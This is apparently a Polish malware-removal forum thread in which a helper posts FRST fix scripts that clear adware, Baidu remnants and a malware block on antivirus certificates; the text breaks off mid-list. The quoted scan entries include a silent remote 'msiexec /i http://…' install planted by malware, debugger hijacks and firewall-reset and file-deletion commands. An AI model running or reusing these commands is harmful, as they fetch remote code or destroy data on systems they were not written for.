picasso

Do usunięcia szczątki po Baidu. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: ShellIconOverlayIdentifiers: [baiduAntivirusIconLock] -> {0A93904A-BB1E-4a0c-9753-B57B9AE272CC} => C:\Program Files (x86)\Baidu Security\Baidu Antivirus\5.4.3.148966.0\BavShx64.dll -> Brak pliku Task: {3C078223-94F7-447C-A454-2CE0D63E53EF} - System32\Tasks\060184C3-9766-46a0-B258-F4518A0B2633 => Cscript.exe "C:\ProgramData\Baidu Security\Duplicaterecord.js" RemoveDirectory: C:\AdwCleaner RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\Program Files (x86)\Baidu Security RemoveDirectory: C:\ProgramData\Baidu RemoveDirectory: C:\ProgramData\Baidu Security RemoveDirectory: C:\Users\Gibon\AppData\LocalLow\BAVData RemoveDirectory: C:\Users\Gibon\AppData\Roaming\Baidu RemoveDirectory: C:\Users\Gibon\AppData\Roaming\BavMini RemoveDirectory: C:\Users\Gibon\Downloads\FRST-OlderVersion RemoveDirectory: C:\Users\Public\Documents\Baidu StartBatch: del /q C:\Users\Gibon\Downloads\cert.reg del /q C:\Windows\system32\bdhookx64.dll del /q C:\Windows\system32\BdSandboxDll64.dll del /q C:\Windows\system32\Drivers\Bprotect.sys.1496687251 del /q C:\Windows\system32\Drivers\Bfilter.sys.1496687249 del /q C:\Windows\system32\Drivers\Bfmon.sys.1496687249 del /q C:\Windows\system32\Drivers\bnbasex64.sys.1496687250 del /q C:\Windows\system32\Drivers\bndef64.sys.1496687251 del /q C:\Windows\SysWOW64\bdhookx86.dll del /q C:\Windows\SysWOW64\BdSandboxDll32.dll EndBatch: Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Przedstaw wynikowy fixlog.txt. I podsumuj jak działa obecnie system.

Temat przenoszę do działu Windows. W raportach nie ma żadnych oznak aktywnej infekcji. Są tylko nieaktywne (puste) szczątki po Ardamax Keylogger, który jak podejrzewam był instalowany celowo. Usunięcie tych odpadków nie przyniesie żadnej poprawy w wydajności. W spoilerze skrypt usuwający owe szczątki oraz wyłączający usługę aktualizatora Huawei Internet Manager produkującą błędy: Dziennik System: ============= Error: (06/05/2017 04:26:24 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Internet Manager. RunOuc z powodu następującego błędu: Usługa nie odpowiada na sygnał uruchomienia lub sygnał sterujący w oczekiwanym czasie. Error: (06/05/2017 04:26:24 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: Upłynął limit czasu (30000 ms) podczas oczekiwania na połączenie się z usługą Internet Manager. RunOuc. Z raportów nic też nie wynika, żadnych wyraźnych tropów co może powodować duże spowolnienie. Jedyne co mi się rzuca w oczy to Avast (jednak co dopiero zainstalowany) oraz Secure Folders. Ten drugi to porzucony i nierozwijany soft, bez oficjalnej kompatybilności z Windows 10, więc stabilność sterownika programu na tej platformie jest pod znakiem zapytania: R1 pnpeap; C:\WINDOWS\system32\drivers\pnpeap.sys [45736 2017-05-03] (Promosoft Software Limited)

Działania do przeprowadzenia: 1. Przez Panel sterowania odinstaluj adware: AlphaGo, amuleC, WinSnare. Jeśli będzie jakiś problem z deinstalacją, kontynuuj i przejdź do działań wyliczonych poniżej. 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: R2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-05-17] (TODO: ) [brak podpisu cyfrowego] S2 CSHMDR; C:\Users\MI\AppData\Local\CSHMDR\Snare.dll [900096 2017-05-22] (IntertSect Alliance Pty Ltd) [brak podpisu cyfrowego] S2 CWASRE; C:\Users\MI\AppData\Local\CWASRE\Snare.dll [828416 2017-05-17] (IntertSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [110592 2017-05-23] () [brak podpisu cyfrowego] R2 IISvr; C:\ProgramData\Package Cache\{59399776-575D-9C54-E861-0D5EAB7E707D}v10.1.14393.795\Installers\IIS\iisexp.dll [105472 2017-05-04] () [brak podpisu cyfrowego] R2 Kitty; C:\Users\MI\AppData\Local\Kitty\Kitty.dll [124928 2017-05-04] (kitty) [brak podpisu cyfrowego] R2 MSLN; C:\ProgramData\Microsoft\Blend\14.0\1033\ResourceCache.dll [399360 2017-01-04] () [brak podpisu cyfrowego] S2 NPASRE; C:\Users\MI\AppData\Local\NPASRE\Snare.dll [830464 2017-05-10] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] S2 snare; C:\Users\MI\AppData\Local\snare\Snare.dll [898048 2017-05-25] (IntertSect Alliance Pty Ltd) [brak podpisu cyfrowego] S2 terana; C:\Users\MI\AppData\Local\terana\terana.dll [909312 2017-05-31] (IntertSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 VNASRE; C:\Users\MI\AppData\Local\VNASRE\Snare.dll [826368 2017-05-09] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 WANARE; C:\Users\MI\AppData\Local\WANARE\Snare.dll [826368 2017-05-05] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 WinAppSvr; C:\ProgramData\Microsoft\AppV\sym\dbg.dll [109056 2017-05-12] (TODO: ) [brak podpisu cyfrowego] R2 WinSAPSvc; C:\Users\MI\AppData\Roaming\WinSAPSvc\WinSAP.dll [1887232 2017-05-17] () [brak podpisu cyfrowego] S0 Avguniva; system32\DRIVERS\avguniva.sys [X] U3 idsvc; Brak ImagePath S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] S1 mvlwfqjo; \??\C:\WINDOWS\system32\drivers\mvlwfqjo.sys [X] U2 WinSnare; Brak ImagePath HKU\S-1-5-21-570807183-2887973835-1248124564-1000\...\Run: [background_fault] => C:\Users\MI\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) HKU\S-1-5-21-570807183-2887973835-1248124564-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.ltdmsjq.com/?data=zDlkMj8dMdk4FdkdRkZYF8M1FdExOYU2NTNWRTkdMWU2MUJSRH== /q IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe GroupPolicy: Ograniczenia Task: {011BBC71-739E-4862-B5F3-2F2DFFE57E7B} - System32\Tasks\NosemayUpdateTaskMachineUA => C:\Program Files (x86)\Nosemay\Update\NosemayUpdate.exe Task: {017D2570-02DE-476E-A42B-37771FF2B192} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Brak pliku Task: {01C995FF-D178-4E7B-AC4A-9E950006A207} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => %SystemRoot%\ehome\mcupdate.exe Task: {0837D897-84CB-4E30-A8DD-807937A81DFC} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => %SystemRoot%\ehome\mcupdate.exe Task: {0F1FC558-90E6-41AA-8D37-4FBE69053762} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => %windir%\ehome\MCUpdate.exe Task: {148318FC-5974-4508-A415-B3AFD16E5DDB} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => %SystemRoot%\ehome\ehPrivJob.exe Task: {19E783A3-8AEE-4CB8-8B5D-F114E00BAB33} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => %SystemRoot%\ehome\mcupdate.exe Task: {1F96044A-9E15-42EC-886D-441BAFAFECED} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku Task: {29308477-8F7E-4D4F-92D5-F1534E61B6F5} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => %SystemRoot%\ehome\ehPrivJob.exe Task: {30212503-2AEC-4B16-848E-334D882D6A53} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Brak pliku Task: {3C9616B2-742C-4820-AFAE-F3D2459E9677} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => %SystemRoot%\ehome\ehPrivJob.exe Task: {3D966D87-5FE5-4FBC-8E90-DB0F48E454DB} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => %SystemRoot%\ehome\ehPrivJob.exe Task: {3E3E65EA-6693-4ACC-947D-206853F50D65} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => %SystemRoot%\ehome\ehPrivJob.exe Task: {42145BE5-4059-431F-919A-1A381C5966DE} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => %SystemRoot%\ehome\mcupdate.exe Task: {4CCE8DE9-7207-4EA6-8407-BDF2684DFE81} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku Task: {6FECF9BE-AED8-4627-80ED-91FF5361960F} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => %SystemRoot%\ehome\ehPrivJob.exe Task: {773492A6-4F08-4DAF-9C1B-778BC17ACAED} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => %SystemRoot%\ehome\ehPrivJob.exe Task: {78588675-6CF3-4E50-B5B1-1EC34EAA2F6B} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => %SystemRoot%\ehome\ehPrivJob.exe Task: {7DDF9673-8D0B-4652-B795-1BEAD1206B65} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => %SystemRoot%\ehome\ehPrivJob.exe Task: {8AB44150-345F-44E5-ABC3-8235DE5E1DE5} - System32\Tasks\NosemayUpdateTaskMachineCore => C:\Program Files (x86)\Nosemay\Update\NosemayUpdate.exe Task: {94C0CB8F-6430-43CD-8CE0-B5A9EDCB5063} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku Task: {9521AF5F-3377-4704-92B9-8835155CFFE6} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1 Task: {A8561EA2-FFCC-479F-A8F3-0D1E90CA4B10} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\MI\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe Task: {AA921623-B84A-4EC8-A6DA-5D46323FC6D9} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => %SystemRoot%\ehome\ehPrivJob.exe Task: {B201CD42-5792-43BE-97D6-74AB486671CA} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Brak pliku Task: {B40C4875-485A-4120-A48B-4E4E32ED8612} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Brak pliku Task: {C778374C-94FE-41B0-B705-5FC952201AC0} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => %SystemRoot%\ehome\mcupdate.exe Task: {D9B027D3-E4DD-42DB-B655-6506173D10B0} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Brak pliku Task: {DB65ACDE-0DF5-4CB0-9415-9658810D1A58} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-17] () Task: {DC3DCC2C-6D40-43C1-9BE5-076B5E2044B0} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Brak pliku Task: {DD548504-31EE-43FF-A573-1E9BCB56DC76} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => %SystemRoot%\ehome\ehrec.exe Task: {E899BB27-DB02-4C11-A531-A261D6E8D363} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Brak pliku Task: {E959E007-A71C-4952-8EA8-22DE146D6227} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => %SystemRoot%\ehome\ehPrivJob.exe Task: {F0496437-71B1-4E96-9E9C-3BC2F52CDE46} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => %SystemRoot%\ehome\mcupdate.exe Task: {F52B9841-800B-4073-B588-B3A2B9DAFB2E} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku Task: {FA831EE3-8E47-422C-913B-86BF798418B5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku Task: {FACB8164-0888-403B-B4E6-7F59329EA90F} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => %SystemRoot%\ehome\ehPrivJob.exe Task: {FBC8485F-A585-489F-8E2C-C65FEABC1BEF} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => %SystemRoot%\ehome\mcupdate.exe Task: {FFEE4F98-789F-4BC5-9EBF-91D4AC658C46} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => %SystemRoot%\ehome\ehPrivJob.exe HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C&q={searchTerms} HKU\S-1-5-21-570807183-2887973835-1248124564-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C&q={searchTerms} HKU\S-1-5-21-570807183-2887973835-1248124564-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C HKU\S-1-5-21-570807183-2887973835-1248124564-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C HKU\S-1-5-21-570807183-2887973835-1248124564-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C&q={searchTerms} SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1 SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1 SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1 SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1 SearchScopes: HKU\S-1-5-21-570807183-2887973835-1248124564-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1 SearchScopes: HKU\S-1-5-21-570807183-2887973835-1248124564-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1 StartMenuInternet: IEXPLORE.EXE - c:\program files\internet explorer\iexplore.exe hxxp://www.ourluckysites.com/?type=sc&ts=1496219886&z=05b1940ea6a6615f7e82dc7gez4tfqcoegft1b8bfq&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C ShortcutWithArgument: C:\Users\MI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1494843707&z=1535c9995935171be08905dg8z1tbzdb4z6c6mdecw&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C ShortcutWithArgument: C:\Users\MI\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C Edge HomeButtonPage: HKU\S-1-5-21-570807183-2887973835-1248124564-1000 -> hxxp://www.nuesearch.com/?type=hp&ts=1473244319&z=1fd95696a597e865f3e8157gdzem5c7o7z0z8c4gab&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C Edge Session Restore: HKU\S-1-5-21-570807183-2887973835-1248124564-1000 -> [funkcja włączona] HKU\S-1-5-21-570807183-2887973835-1248124564-1000\...\ChromeHTML: -> C:\Program Files (x86)\Eggper\Application\chrome.exe (Google Inc.) HKU\S-1-5-21-570807183-2887973835-1248124564-1000\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Eggper\Application\chrome.exe (Google Inc.) Reg: reg export "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy" C:\Users\MI\Desktop\edge.reg DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins DeleteKey: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OpenSearch DeleteValue: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy|ProtectedHomepages DeleteValue: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy|ProtectedSearchScopes C:\Program Files (x86)\GUT5E88.tmp C:\Program Files (x86)\metadata C:\Program Files (x86)\settings.dat C:\Program Files (x86)\AlphaGo C:\Program Files (x86)\Default Company Name C:\Program Files (x86)\Eggper C:\Program Files (x86)\Firefox C:\Program Files (x86)\Google C:\Program Files (x86)\MIO C:\Program Files (x86)\Nosemay C:\ProgramData\BIT C:\ProgramData\Microsoft\AppV C:\ProgramData\Microsoft\Blend C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\ProgramData\Package Cache\{59399776-575D-9C54-E861-0D5EAB7E707D}v10.1.14393.795 C:\Users\MI\AppData\Local\background_fault C:\Users\MI\AppData\Local\CSHMDR C:\Users\MI\AppData\Local\CWASRE C:\Users\MI\AppData\Local\Eggper C:\Users\MI\AppData\Local\Google C:\Users\MI\AppData\Local\Kitty C:\Users\MI\AppData\Local\NPASRE C:\Users\MI\AppData\Local\SNARE C:\Users\MI\AppData\Local\terana C:\Users\MI\AppData\Local\VNASRE C:\Users\MI\AppData\LocalLow\Mozilla C:\Users\MI\AppData\Roaming\ICSW_1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1ItJ1V0O1E1P1C1T1V0I0C.txt C:\Users\MI\AppData\Roaming\Firefox C:\Users\MI\AppData\Roaming\WinSAPSvc C:\Users\MI\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\MI\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\MI\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk C:\Users\MI\Desktop\BigFarm.lnk C:\Users\MI\Desktop\big_bang_empire.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Users\Public\Documents\report.dat C:\Users\Public\Documents\temp.dat C:\WINDOWS\ehome C:\WINDOWS\psgo C:\WINDOWS\system32\Drivers\aatkrykk.sys C:\WINDOWS\System32\Tasks\Microsoft\Windows\Media Center C:\WINDOWS\SysWOW64\1 C:\WINDOWS\SysWOW64\1111 C:\WINDOWS\SysWOW64\2222 C:\WINDOWS\SysWOW64\3333 CMD: netsh advfirewall reset Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Ustaw Internet Explorer jako domyślną przeglądarkę. 4. Zrób nowe logi FRST: - Standardowe z opcji Skanuj (Scan), bez Shortcut. - W polu Szukaj (Search) wklej co poniżej i klik w Szukaj w rejestrze (Search Registry). Przedstaw wynikowy SearchReg.txt. Eggper;Firefox Dołącz też plik fixlog.txt. Na Pulpicie pojawił się również plik edge.reg - shostuj go gdzieś i podaj link do pliku.

Popraw link do forum. Certyfikat jest ważny tylko dla adresu z www, który jest zdefiniowany jako główny URL forum. Działa: https://www.fixitpc.pl/ Nie działa: https://fixitpc.pl/ Automatyczne przekierowanie adresu bez www na adres z www ma być zrobione w dalszym terminie.

Wszystko pomyślnie usunięte, AdwCleaner i inne programy zabezpieczające odblokowane, obecnie brak oznak infekcji. Jeśli nadal system wolno działa, problem nie leży w infekcji. I sugeruję deinstalację Baidu Antivirus, który pojawił się w trakcie próby rozwiązania problemu. Jest to przeciętny i nierozwijany (w wersji anglojęzycznej) antywirus, powiązany też z kontrowersyjnymi technikami instalacji PUP (np. AdwCleaner usuwa niektóre komponenty Baidu). Na Windows 10 nie jest nawet potrzebny dodatkowy AV, wbudowany Windows Defender spełnia rolę całkiem dobrze. Poza tym, w Dzienniku zdarzeń są notowalne błędy związane z tym software: Dziennik System: ============= Error: (06/05/2017 08:07:07 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Baidu Hook Base z powodu następującego błędu: Urządzenie dołączone do komputera nie działa. Po wykonaniu deinstalacji potrzebne nowe raporty FRST (bez Shortcut), by potwierdzić, że wszystkie startowe obiekty Baidu zostały odinstalowane.

Mam też prośbę, by nie stosować serwisów hostujących obrazy, które nadal działają w trybie http. Być może nawet je zablokuję, by zapobiec postowaniu takich linków. Przykładowy hosting obrazków działający w pożądanym trybie https: Postimage.

"HKU\S-1-5-21-*" to nie wirus tylko normalny identyfikator konta użytkownika, obecny w każdym Windows. Problem leży gdzie indziej, malware wprowadziło blokadę programów zabezpieczających w oparciu o funkcję Niezaufanych certyfikatów, dlatego m.in. AdwCleaner nie działa (blokada certyfikatu Malwarebytes). Działania do przeprowadzenia: 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: StartBatch: netsh advfirewall reset reg export HKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Users\Gibon\Desktop\cert.reg EndBatch: HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (U) HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (U) HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (U) HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (U) HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (U) HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (U) HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (U) HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (U) HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (U) HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (U) HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (U) HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (U) HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) HKLM\ DisallowedCertificates: 